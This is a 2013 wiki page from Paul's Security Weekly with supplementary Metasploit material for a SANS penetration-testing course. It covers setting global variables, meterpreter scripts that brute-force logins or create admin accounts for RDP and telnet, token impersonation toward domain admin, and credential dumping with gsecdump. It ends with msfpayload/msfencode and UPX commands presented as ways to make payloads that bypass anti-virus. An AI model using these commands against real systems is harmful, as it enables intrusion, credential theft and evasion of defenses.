Metasploit

From Paul's Security Weekly
Revision as of 23:26, 10 April 2013 by Paul Asadoorian (Talk | contribs)

Jump to: navigation, search
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security
BlackSquirrel
Onapsis

Security Weekly iTunes Security Weekly on YouTube Security Weekly Feed Security Weekly Facebook Fan Page Follow Us On Twitter LinkedIN Blip.TV Google+

Introduction

This page is presented without warranty or support. It is meant to provide supplementary materials as a reference for Metasploit and is not part of any official course material. Please direct all comments, questions, and suggestions to psw@pauldotcom.com.

Thank You,

The PaulDotCom Team

SEC553 Materials

The SANS course uses the following software:

  • Firefox - For the browser_autopwn exercise you will need an older version of Firefox, Download Firefox Version 1.0.4 Here. This should also be installed on your Windows VM that you will be exploiting.

Setup Your Environment

Using the "setg" command you can set global datastores (variables). Once you've setup your RHOST, for example, you can issue the "save" command and metasploit will write your global datastores to a config file in your home directory in the ".msf" directory. Below is an example:

msf > setg

Global
======

  Name   Value           
  ----   -----           
  RHOST  192.168.169.30  

msf > setg RHOST 192.168.169.40
RHOST => 192.168.169.40
msf > save
Saved configuration to: /Users/paul/.msf3/config
msf > setg

Global
======

  Name   Value           
  ----   -----           
  RHOST  192.168.169.40  

msf >

References & Resources

PaulDotCom Technical Segments On Metasploit and Practical Usages

  • "karmetasploit" technical Segment: PaulDotCom Episode 114 - Probably one of the most powerful features in Metasploit is its integration with Karma, a wireless attack that lets you become the access point for any probe SSID. Scripts allow you to do evil things to the client, such as steal cookies and Windows authentication credentials.

Other Metasploit Related Resources

Icecast Exploit

Icecast exploit.png

Icecast Background Task

Icecast background.png

HTTP Scanner

Http scanner.png

Database: db_nmap

Db nmap.png

Custom Meterpreter Scripts

Go to http://darkoperator.blogspot.com/ and review the available downloads:

  • gettelnet- This script will enable telnet service on the target machine if it is running Windows 2003 or higher, in the case of Windows Vista and Windows 2008 that do not have the service installed by default the script will install the service and configure it to start automatically, in addition a username and password can be provided so that a local account with administrative privelages can be created and placed in the apropiate groups.
  • remotewinenun - This script will run wmic command enumerating diferent settings from a target computer using the credential of the process under withc meterpreter is running under, a username and password can also be provided.
  • Winenum - general windows enumeration script for gathering all kinds of information from windows host adapting the commands and informatio gathered to the version of windows where is ran at.
  • Netenum - network enumeration script for performing basic network enumeration of the target enviroment. It will perform ping sweeps, hostname bruteforce, reverse lokkups on ranges and general DNS record enumeration.
  • Winbf - it will perform loging brute force attacks against winown logins using dictionaries against a single login or a list of usernames. It will also enumerate the current windows account lockout and lenght policy so the user will be able to better tailor the attack.
  • Getgui - script for enabling RDP and for creating an account adding it to the appropiate groups to be able to get Remote Desktop on the target machine.

Now go to this directory "<metasploit dir>/scripts/meterpreter/" and download the scripts:

wget http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/getgui.rb
wget http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/winbf.rb
wget http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/netenum.rb
wget http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/winenum.rb
wget http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/remotewinenum.rb
wget http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/gettelnet.rb

Check out cool posts from "Darkoperator":

http://forum.pauldotcom.com/search.php?search_id=1583029610

Bonus: Find and run the custom script darkoperator wrote for PaulDotCom.

Winenum In Action

Winenum.png

GetGui In Action

Getgui.png

Token Passing With Incognito

I did not have a domain to test with, so this example is pretty silly. However, the bottom line here is that you can jump from a local admin account to a domain admin account in most cases. I think this is a pretty big security hole, Microsoft does not and dismisses it as "working by design". Below is an example:

Incognito.png


  • Another great tool for this is gsecdump
  • Check out carnal0wnage blog post for more information. Even more interesting is the comments that link to another resource which *claims* to be able to copy the SAM database without Admin privs. It is somehow able to bypass the file restrictions/permissions by accessing the hard drive directly. We have not tested this.

Using Metasploit To Bypass Anti-Virus

After we gave the above tech segment, some corrections were posted by Mark Bagget:

http://www.indepthdefense.com/2008/12/msfencoding-tips-and-sans-cdi.html

So we end up with the following commands to create msf payloads that bypass anti-virus software:

bash-3.2# ./msfpayload windows/meterpreter/bind_tcp LPORt=4444 R | ./msfencode -t exe -o evil.exe
[*] x86/shikata_ga_nai succeeded, final size 335

bash-3.2# md5 evil.exe
MD5 (evil.exe) = a4c3438633637f37ab10cd16dc9de353
bash-3.2# ./msfpayload windows/meterpreter/bind_tcp LPORt=4444 R | ./msfencode -t exe -o evil.exe
[*] x86/shikata_ga_nai succeeded, final size 335

bash-3.2# md5 evil.exe
MD5 (evil.exe) = 25c08351d3bcdfa08da60509a17ee631

NOTE: Metasploit is not a packer, so it does not have a facility to take a binary payload and "pack" it. We've had great luck using UPX and PEScrambler for this purpose. Unfortunately, the PEScramber web site has been taken down. I do have a copy, and have been known to share :) For UPX, you can take any windows binary and do this (using gsecdump.exe as an example):

c:\> upx -2 -o gsecupx.exe gsecdump.exe